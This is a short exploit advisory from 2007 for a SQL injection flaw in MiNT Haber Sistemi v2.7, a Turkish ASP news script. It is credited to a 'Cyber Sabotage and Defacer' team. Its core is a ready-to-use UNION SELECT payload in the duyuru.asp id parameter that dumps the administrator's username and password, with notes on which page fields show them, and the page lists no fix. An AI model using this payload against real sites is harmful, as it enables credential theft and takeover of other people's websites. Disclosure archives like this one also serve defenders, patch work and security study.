Mint Haber Sistemi 2.7 (duyuru.asp id) Remote SQL Injection Vulnerability

2007-01-12 00:00:00

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: [email protected]
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi : USERNAME
#Duyuru Metni : PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

#

Fixes

No fixes

In order to submit a new fix you need to be registered.